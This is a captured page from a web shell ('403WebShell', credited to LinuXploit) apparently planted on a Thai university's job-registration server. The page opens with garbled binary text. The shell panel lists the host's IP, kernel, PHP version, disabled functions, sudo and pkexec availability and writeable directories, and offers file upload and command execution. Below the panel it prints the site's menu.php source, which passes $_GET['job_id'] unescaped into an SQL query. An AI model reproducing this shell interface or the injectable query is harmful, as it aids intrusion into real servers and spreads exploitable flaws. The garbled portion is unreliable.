h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/regisjob/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/regisjob/menu.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
		<meta name="description" content="">
		<meta name="author" content="">
		<title>มหาวิทยาลัยราชภัฎสงขลา</title>  
		<script src="js/jquery.js"></script>		
		<script src="js/bootstrap.min.js"></script>
		<script src="js/bootbox.min.js"></script>
        
        
		<link rel="stylesheet" href="css/bootstrap.min.css">
        <link href="landingwork_files/style.css" rel="stylesheet">
	

		<script type="text/javascript"> 
			function showSlidingDiv(i){
				var str="#slidingDiv"+i;
				$(str).animate({"height": "toggle"}, { duration: 1000 });
			}
		</script>

<title>มหาวิทยาลัยราชภัฎสงขลา</title>

	
<style type="text/css">
		
    /*header area*/
   /*header area*/
    .top-header{
        /*background: #fff !important;*/
        position: static;
        width: 100%;
        z-index: 99999;
        /* background-image: url('assets/img/topHeaderrgb(89,172,255),rgb(89,172,255).jpg'); */
        height: 25%;
        background-image: linear-gradient(rgb(89,172,255), rgb(89,172,255));
        
    }
    .footer {
        height: 10%;
        display: block;
        background-color: lightblue;
        text-align: center;
        
        /* background-image: url('assets/img/footerrgb(89,172,255),rgb(89,172,255).jpg'); */
        background-image: linear-gradient(rgb(89,172,255), rgb(89,172,255));
        width:100%; 
        left:0; 
        bottom:0;
    }
    .list-group-item.active, 
    .list-group-item.active:hover, 
    .list-group-item.active:focus {
        z-index: 2;
        color: #fff;
        background-color: #82b8e6;
        border-color: #337ab7;
    }
    .menulist .active {
        background: #63aff1;
        border: #000000;

    }
    .menulist li:hover{
            background: #bdd5ea;

    }
    .panel-default > .panel-heading {
        color: #fff;
        background-color: #63aff1;
        font-size: 25px;
    /* border: 1px solid ;
        */
    }
    .panel-default > .panel-heading2 {
        color: #FFFFFF;
        background-color: #CC0000;
        font-size: 28px;
    /* border: 1px solid ;
        */
    }


    .imgHead{
        height: 30%;
        width: 30%;
    }

</style>
</head>
<?php //CONNECT
//$conn=mysqli_connect("localhost","root","","jobregis");
//mysqli_query($conn, "SET NAMES UTF8");


// Create connection
include("include/connect.php");

  					 $sql="SELECT * FROM jobposition WHERE job_id='".$_GET['job_id']."'";
 
                     $result = mysqli_query($conn,$sql);
					 $row = mysqli_fetch_array($result);
					 $c=$row['job_name'];
					 $peeid=$row['pee_id'];
?>

<body>

	<!-- header -->
	<div class="top-header ">
			<div class="container">
				<div class="row">
					<div class="col-md-12 form-inline center-text">
                            <div class="form-group">
                                <a href=""><img class="img-responsive " src="pic/logo.png" alt="">
                                </a>
                            </div>
					</div>
                    <div class="col-md-12 form-inline center-text">
                           
                               <h3 style="color:#FFF">ระบบรับสมัครงาน มหาวิทยาลัยราชภัฏสงขลา</h3>
                        <h4 style="color:#FFF">Songkhla Rajabhat University</h4>
					</div>
                
                      
                      		
				</div>
			</div> 
		</div>
		<!-- end header -->
        	<!--layout menu -->
            
		<div class="container" style="margin-bottom:40px;">
			<div class="row" style="padding-top: 20px;">
				<div class="col-md-3" >
					<!-- menu -->
                    <ul class="list-group menulist" >
                        <a href="index.php?job_id=<?php echo $row['job_id'];?>">
                            <li id ="index" class='list-group-item active'>
                                หน้าแรก
                            </li>
                        </a>
                        
                        <a href="rule.php??job_id=<?php echo $row['job_id'];?>">
                            <li class='list-group-item ' id ="register">
                                สมัครสอบ
                            </li>
                        </a>
                        
                        <a href="search.php?z=2">
                            <li class='list-group-item ' id ="print">
                                ตรวจสถานะการสมัครสอบ
                            </li>
                        </a>
                        
                                <a href="searchA.php?z=4">
                                <li class='list-group-item ' id ="printA">
                                    พิมพ์ใบสมัคร
                                </li>
                            </a>
                            
                        
                    
                        <a href="problem.php?z=5">
                            <li class='list-group-item ' id="problem.php">
                                สารพันปัญหา
                            </li>
                        </a>
                        
                        <a href="http://203.21.42.34/acc/index.html" target="_blank">
                            <li class='list-group-item ' id="problem.php">
                                ตรวจสอบคุณวุฒิตามที่ ก.พ. รับรอง
                            </li>
                        </a>
                    
                    </ul>
				</div>
			<div class="col-md-9" >
					<?php include("submenu.php");?>         
            </div>                      
    		<!-- footer starts here -->
<?php include("admin/foot.php");?>
		<!-- 	footer -->
                    
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit